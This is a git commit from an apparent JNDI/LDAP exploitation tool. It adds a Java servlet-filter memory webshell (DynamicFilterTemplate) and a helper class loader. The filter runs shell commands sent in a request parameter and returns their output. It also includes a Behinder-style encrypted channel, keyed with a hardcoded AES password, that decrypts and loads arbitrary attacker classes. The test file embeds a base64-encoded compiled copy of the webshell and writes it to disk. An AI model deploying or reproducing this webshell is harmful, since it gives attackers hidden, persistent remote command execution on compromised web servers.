将2个引用自其他项目的类 MyClassLoader、DynamicFilterTemplate 本地化，并修改相应的代码

Author: feihong

src/main/java/com/feihong/ldap/template/DynamicFilterTemplate.java

@@ -0,0 +1,105 @@
+package com.feihong.ldap.template;
+
+import sun.misc.BASE64Decoder;
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+import javax.servlet.*;
+import javax.servlet.http.HttpServletRequest;
+import java.io.File;
+import java.io.IOException;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import java.util.Scanner;
+
+public class DynamicFilterTemplate implements Filter {
+
+    private Class myClassLoaderClazz;
+    private String basicCmdShellPwd = "pass";
+    private String behinderShellHeader = "X-Options-Ai";
+    private String behinderShellPwd = "e45e329feb5d925b"; // rebeyond
+
+    public DynamicFilterTemplate(){
+        super();
+        initialize();
+    }
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    @Override
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        System.out.println("[+] Dynamic Filter says hello");
+
+
+        if(servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")){
+            //basic cmd shell
+            String cmd = servletRequest.getParameter(basicCmdShellPwd);
+            if(cmd != null && !cmd.isEmpty()){
+                String[] cmds = null;
+                if(File.separator.equals("/")){
+                    cmds = new String[]{"/bin/sh", "-c", cmd};
+                }else{
+                    cmds = new String[]{"cmd", "/C", cmd};
+                }
+                String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
+                servletResponse.getWriter().println(result);
+            }
+        }else if(((HttpServletRequest)servletRequest).getHeader(behinderShellHeader) != null){
+            //behind3 shell
+            try{
+                if (((HttpServletRequest)servletRequest).getMethod().equals("POST")){
+                    String k = behinderShellPwd;
+                    ((HttpServletRequest)servletRequest).getSession().setAttribute("u",k);
+                    Cipher cipher = Cipher.getInstance("AES");
+                    cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES"));
+                    byte[] evilClassBytes = cipher.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(servletRequest.getReader().readLine()));
+                    Class evilClass = (Class) myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke(null, evilClassBytes, Thread.currentThread().getContextClassLoader());
+                    Object evilObject = evilClass.newInstance();
+                    Method targetMethod = evilClass.getDeclaredMethod("equals", new Class[]{ServletRequest.class, ServletResponse.class});
+                    targetMethod.invoke(evilObject, new Object[]{servletRequest, servletResponse});
+                }
+            }catch(Exception e){
+                e.printStackTrace();
+            }
+        }else{
+            filterChain.doFilter(servletRequest, servletResponse);
+        }
+    }
+
+    @Override
+    public void destroy() {
+
+    }
+
+    private void initialize(){
+        try{
+            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+            try{
+                this.myClassLoaderClazz = classLoader.loadClass("com.feihong.ldap.template.MyClassLoader");
+            } catch (ClassNotFoundException e) {
+                Class clazz = classLoader.getClass();
+                Method method = null;
+                while(method == null && clazz != Object.class){
+                    try{
+                        method = clazz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+                    }catch(NoSuchMethodException ex){
+                        clazz = clazz.getSuperclass();
+                    }
+                }
+
+                String code = "yv66vgAAADIAGwoABQAWBwAXCgACABYKAAIAGAcAGQEABjxpbml0PgEAGihMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAClMY29tL2ZlaWhvbmcvbGRhcC90ZW1wbGF0ZS9NeUNsYXNzTG9hZGVyOwEAAWMBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAC2RlZmluZUNsYXNzAQAsKFtCTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspTGphdmEvbGFuZy9DbGFzczsBAAVieXRlcwEAAltCAQALY2xhc3NMb2FkZXIBAApTb3VyY2VGaWxlAQASTXlDbGFzc0xvYWRlci5qYXZhDAAGAAcBACdjb20vZmVpaG9uZy9sZGFwL3RlbXBsYXRlL015Q2xhc3NMb2FkZXIMAA8AGgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAFyhbQklJKUxqYXZhL2xhbmcvQ2xhc3M7ACEAAgAFAAAAAAACAAAABgAHAAEACAAAADoAAgACAAAABiortwABsQAAAAIACQAAAAYAAQAAAAQACgAAABYAAgAAAAYACwAMAAAAAAAGAA0ADgABAAkADwAQAAEACAAAAEQABAACAAAAELsAAlkrtwADKgMqvrYABLAAAAACAAkAAAAGAAEAAAAIAAoAAAAWAAIAAAAQABEAEgAAAAAAEAATAA4AAQABABQAAAACABU=";
+                byte[] bytes = new BASE64Decoder().decodeBuffer(code);
+                method.setAccessible(true);
+                this.myClassLoaderClazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length);
+            }
+        } catch (IllegalAccessException e) {
+            e.printStackTrace();
+        } catch (IOException e) {
+            e.printStackTrace();
+        } catch (InvocationTargetException e) {
+            e.printStackTrace();
+        }
+    }
+}

src/main/java/com/feihong/ldap/template/JBossMemshellTemplate.java

@@ -0,0 +1,10 @@
+package com.feihong.ldap.template;
+
+public class MyClassLoader extends ClassLoader {
+    MyClassLoader(ClassLoader c){super(c);}
+
+
+    public static Class defineClass(byte[] bytes, ClassLoader classLoader){
+        return new MyClassLoader(classLoader).defineClass(bytes, 0, bytes.length);
+    }
+}

src/main/java/com/feihong/ldap/template/JettyMemshellTemplate.java

@@ -1,6 +1,10 @@
 import com.feihong.ldap.utils.Util;
 import org.junit.Test;
 
+import java.io.File;
+import java.io.FileNotFoundException;
+import java.io.FileOutputStream;
+
 public class TestBase64 {
     @Test
     public void testEncoder() throws Exception {
@@ -16,4 +20,33 @@ public void testDecoder() throws Exception{
         byte[] bytes = Util.base64Decode(base64Strng);
         System.out.println(new String(bytes));
     }
+
+    @Test
+    public void test() throws Exception {
+        String base64String = "yv66vgAAADIBWQoAPwChCgBaAKIJAKMApAgApQoApgCnCACoCwBFAKkIAKoKAA4AqwoArACtCgAOAK4JAK8AsAgAsQcAsggAswgAtAgAcQgAtQcAtgoAtwC4CgC3ALkKALoAuwoAEwC8CAC9CgATAL4KABMAvwsARgDACgDBAKcHAMIKAKwAwwsAHQDECwAdAMUIAMYKAKwAxwsAHQDICADJCwDKAMsIAMwKAM0AzgcAzwcA0AoAKQChCwDKANEKACkA0ggA0woAKQDUCgApANUKAA4A1goAKADXCgDNANgHANkKADMAoQsARQDaCgDbANwKADMA3QoAzQDeCQBaAN8IAOAHAOEHAHYHAOIKADsA4wcA5AoA5QDmCgDlAOcKAOgA6QoAOwDqCADrBwDsBwDtBwDuCgBHAO8LAPAA8QgA8goAPQDzBwD0CgA/APUJAPYA9wcA+AoAOwD5CAD6CgDoAPsKAPYA/AcA/QoAVADvBwD+CgBWAO8HAP8KAFgA7wcBAAcBAQEAEm15Q2xhc3NMb2FkZXJDbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACxMY29tL21lbXNoZWxsL2dlbmVyaWMvRHluYW1pY0ZpbHRlclRlbXBsYXRlOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAQIBAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA2NtZAEAAWsBAAZjaXBoZXIBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAA5ldmlsQ2xhc3NCeXRlcwEAAltCAQAJZXZpbENsYXNzAQAKZXZpbE9iamVjdAEAEkxqYXZhL2xhbmcvT2JqZWN0OwEADHRhcmdldE1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAPc2VydmxldFJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEAC2ZpbHRlckNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQANU3RhY2tNYXBUYWJsZQcAsgcAbgcA7gEAB2Rlc3Ryb3kBAAppbml0aWFsaXplAQACZXgBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAAVjbGF6egEABm1ldGhvZAEABGNvZGUBAAVieXRlcwEAIkxqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbjsBAAtjbGFzc0xvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEALUxqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uOwcBAAcA4gcA9AcA4QcBAwcA+AcA/QcA/gcA/wEAClNvdXJjZUZpbGUBABpEeW5hbWljRmlsdGVyVGVtcGxhdGUuamF2YQwAXgBfDACJAF8HAQQMAQUBBgEAHVsrXSBEeW5hbWljIEZpbHRlciBzYXlzIGhlbGxvBwEHDAEIAQkBAAR0eXBlDAEKAQsBAAViYXNpYwwA6wEMBwENDAEOAQ8MARABEQcBEgwBEwBwAQABLwEAEGphdmEvbGFuZy9TdHJpbmcBAAcvYmluL3NoAQACLWMBAAIvQwEAEWphdmEvdXRpbC9TY2FubmVyBwEUDAEVARYMARcBGAcBGQwBGgEbDABeARwBAAJcQQwBHQEeDAEfAQ8MASABIQcBIgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QMASMBDwwBIwELDAEkAQ8BAARQT1NUDAElAQ8MASYBJwEAAXUHASgMASkBKgEAA0FFUwcBKwwBLAEtAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDAEuAS8MATABMQEAAAwBMAEyDAEzAQ8MATQBNQwAXgE2DABlATcBABZzdW4vbWlzYy9CQVNFNjREZWNvZGVyDAE4ATkHAToMATsBDwwBPAE9DAE+AT8MAFwAXQEAC2RlZmluZUNsYXNzAQAPamF2YS9sYW5nL0NsYXNzAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyDAFAAUEBABBqYXZhL2xhbmcvT2JqZWN0BwFCDAFDAUQMAUUBRgcBAwwBRwFIDAFJAUoBAAZlcXVhbHMBABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAFLAF8HAUwMAGsBTQEAImNvbS5tZW1zaGVsbC5nZW5lcmljLk15Q2xhc3NMb2FkZXIMAU4BTwEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uDAFQAVEHAVIMAVMAXQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24MAVQBUQEDEHl2NjZ2Z0FBQURJQUd3b0FCUUFXQndBWENnQUNBQllLQUFJQUdBY0FHUUVBQmp4cGJtbDBQZ0VBR2loTWFtRjJZUzlzWVc1bkwwTnNZWE56VEc5aFpHVnlPeWxXQVFBRVEyOWtaUUVBRDB4cGJtVk9kVzFpWlhKVVlXSnNaUUVBRWt4dlkyRnNWbUZ5YVdGaWJHVlVZV0pzWlFFQUJIUm9hWE1CQUNSTVkyOXRMMjFsYlhOb1pXeHNMMmRsYm1WeWFXTXZUWGxEYkdGemMweHZZV1JsY2pzQkFBRmpBUUFYVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc0JBQXRrWldacGJtVkRiR0Z6Y3dFQUxDaGJRa3hxWVhaaEwyeGhibWN2UTJ4aGMzTk1iMkZrWlhJN0tVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUZZbmwwWlhNQkFBSmJRZ0VBQzJOc1lYTnpURzloWkdWeUFRQUtVMjkxY21ObFJtbHNaUUVBRWsxNVEyeGhjM05NYjJGa1pYSXVhbUYyWVF3QUJnQUhBUUFpWTI5dEwyMWxiWE5vWld4c0wyZGxibVZ5YVdNdlRYbERiR0Z6YzB4dllXUmxjZ3dBRHdBYUFRQVZhbUYyWVM5c1lXNW5MME5zWVhOelRHOWhaR1Z5QVFBWEtGdENTVWtwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjenNBSVFBQ0FBVUFBQUFBQUFJQUFBQUdBQWNBQVFBSUFBQUFPZ0FDQUFJQUFBQUdLaXUzQUFHeEFBQUFBZ0FKQUFBQUJnQUJBQUFBQkFBS0FBQUFGZ0FDQUFBQUJnQUxBQXdBQUFBQUFBWUFEUUFPQUFFQUNRQVBBQkFBQVFBSUFBQUFSQUFFQUFJQUFBQVF1d0FDV1N1M0FBTXFBeXErdGdBRXNBQUFBQUlBQ1FBQUFBWUFBUUFBQUFnQUNnQUFBQllBQWdBQUFCQUFFUUFTQUFBQUFBQVFBQk1BRGdBQkFBRUFGQUFBQUFJQUZRPT0MAVUBVgwBVwFYAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAKmNvbS9tZW1zaGVsbC9nZW5lcmljL0R5bmFtaWNGaWx0ZXJUZW1wbGF0ZQEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABtjb20vbWVtc2hlbGwvZ2VuZXJpYy9Db25maWcBAAtnZXRQYXNzd29yZAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAHaXNFbXB0eQEAAygpWgEADGphdmEvaW8vRmlsZQEACXNlcGFyYXRvcgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEACWdldEhlYWRlcgEACWdldE1ldGhvZAEAFmdldEJlaGluZGVyU2hlbGxQd2RQd2QBAApnZXRTZXNzaW9uAQAiKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbgEADHNldEF0dHJpYnV0ZQEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDspVgEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAMZ2V0QXR0cmlidXRlAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEACGdldEJ5dGVzAQAEKClbQgEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAlnZXRSZWFkZXIBABooKUxqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBAAhyZWFkTGluZQEADGRlY29kZUJ1ZmZlcgEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAAdkb0ZpbmFsAQAGKFtCKVtCAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAPcHJpbnRTdGFja1RyYWNlAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQANZ2V0U3VwZXJjbGFzcwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsAIQBaAD8AAQBbAAEAAgBcAF0AAAAFAAEAXgBfAAEAYAAAADsAAQABAAAACSq3AAEqtwACsQAAAAIAYQAAAA4AAwAAABMABAAUAAgAFQBiAAAADAABAAAACQBjAGQAAAABAGUAZgACAGAAAAA1AAAAAgAAAAGxAAAAAgBhAAAABgABAAAAGgBiAAAAFgACAAAAAQBjAGQAAAAAAAEAZwBoAAEAaQAAAAQAAQBqAAEAawBsAAIAYAAAAuEABwAKAAABprIAAxIEtgAFKxIGuQAHAgDGAJArEga5AAcCABIItgAJmQCAK7gACrkABwIAOgQZBMYAbRkEtgALmgBlAToFsgAMEg22AAmZABsGvQAOWQMSD1NZBBIQU1kFGQRTOgWnABgGvQAOWQMSEVNZBBISU1kFGQRTOgW7ABNZuAAUGQW2ABW2ABa3ABcSGLYAGbYAGjoGLLkAGwEAGQa2ABynAQgrwAAduAAeuQAfAgDGAPErwAAduQAgAQASIbYACZkA07gAIjoEK8AAHbkAIwEAEiQZBLkAJQMAEia4ACc6BRkFBbsAKFm7AClZtwAqK8AAHbkAIwEAEiS5ACsCALYALBIttgAutgAvtgAwEia3ADG2ADIZBbsAM1m3ADQruQA1AQC2ADa2ADe2ADg6Biq0ADkSOgW9ADtZAxI8U1kEEj1TtgA+AQW9AD9ZAxkGU1kEuABAtgBBU7YAQsAAOzoHGQe2AEM6CBkHEkQFvQA7WQMSRVNZBBJGU7YAPjoJGQkZCAW9AD9ZAytTWQQsU7YAQlenABU6BBkEtgBIpwALLSssuQBJAwCxAAEArwGQAZMARwADAGEAAABuABsAAAAeAAgAIQAjACMALgAkADsAJQA+ACYASQAnAGEAKQB2ACsAkgAsAJ0ALgCvADEAwAAyAMUAMwDXADQA3gA1ARIANgEsADcBXgA4AWUAOQF8ADoBkAA+AZMAPAGVAD0BmgA+AZ0AQAGlAEIAYgAAAI4ADgA+AF8AbQBuAAUAkgALAG8AcAAGAC4AbwBxAHAABADFAMsAcgBwAAQA3gCyAHMAdAAFASwAZAB1AHYABgFeADIAdwBdAAcBZQArAHgAeQAIAXwAFAB6AHsACQGVAAUAfAB9AAQAAAGmAGMAZAAAAAABpgB+AH8AAQAAAaYAgACBAAIAAAGmAIIAgwADAIQAAAAZAAj9AGEHAIUHAIYU+QAmAvsA70IHAIcJBwBpAAAABgACAFYAagABAIgAXwABAGAAAAArAAAAAQAAAAGxAAAAAgBhAAAABgABAAAARwBiAAAADAABAAAAAQBjAGQAAAACAIkAXwABAGAAAAIDAAcABwAAAKm4AEC2AEFMKisSSrYAS7UAOacAf00rtgBNTgE6BBkExwAzLRI/pQAtLRI6Br0AO1kDEjxTWQSyAE5TWQWyAE5TtgA+OgSn/9g6BS22AFBOp//OElE6BbsAM1m3ADQZBbYANzoGGQQEtgBSKhkEKwa9AD9ZAxkGU1kEA7gAU1NZBRkGvrgAU1O2AELAADu1ADmnABhMK7YAVacAEEwrtgBXpwAITCu2AFmxAAUABwARABQATAAoAEUASABPAAAAkACTAFQAAACQAJsAVgAAAJAAowBYAAMAYQAAAGoAGgAAAEsABwBNABEAXQAUAE4AFQBPABoAUAAdAFEAKABTAEUAVgBIAFQASgBVAE8AVgBSAFkAVgBaAGQAWwBqAFwAkABkAJMAXgCUAF8AmABkAJsAYACcAGEAoABkAKMAYgCkAGMAqABlAGIAAABwAAsASgAFAIoAiwAFABoAdgCMAF0AAwAdAHMAjQB7AAQAVgA6AI4AcAAFAGQALACPAHYABgAVAHsAfACQAAIABwCJAJEAkgABAJQABAB8AJMAAQCcAAQAfACUAAEApAAEAHwAlQABAAAAqQBjAGQAAACEAAAAOgAJ/wAUAAIHAJYHAJcAAQcAmP4ACAcAmAcAmQcAmmoHAJsJ/wA9AAEHAJYAAEIHAJxHBwCdRwcAngQAAQCfAAAAAgCg";
+        FileOutputStream fous = new FileOutputStream("1.class");
+        fous.write(Util.base64Decode(base64String));
+        fous.close();
+
+    }
+
+    @Test
+    public void test2() throws Exception {
+        String code = Util.getClassCode("com.feihong.ldap.template.MyClassLoader");
+        FileOutputStream fous = new FileOutputStream("Test1.class");
+        fous.write(Util.base64Decode(code));
+        fous.close();
+
+        System.out.println(code);
+    }
+
+    @Test
+    public void test3() throws Exception {
+        String code = Util.getClassCode("com.feihong.ldap.template.DynamicFilterTemplate");
+        FileOutputStream fous = new FileOutputStream("Test2.class");
+        fous.write(Util.base64Decode(code));
+        fous.close();
+
+        System.out.println(code);
+    }
 }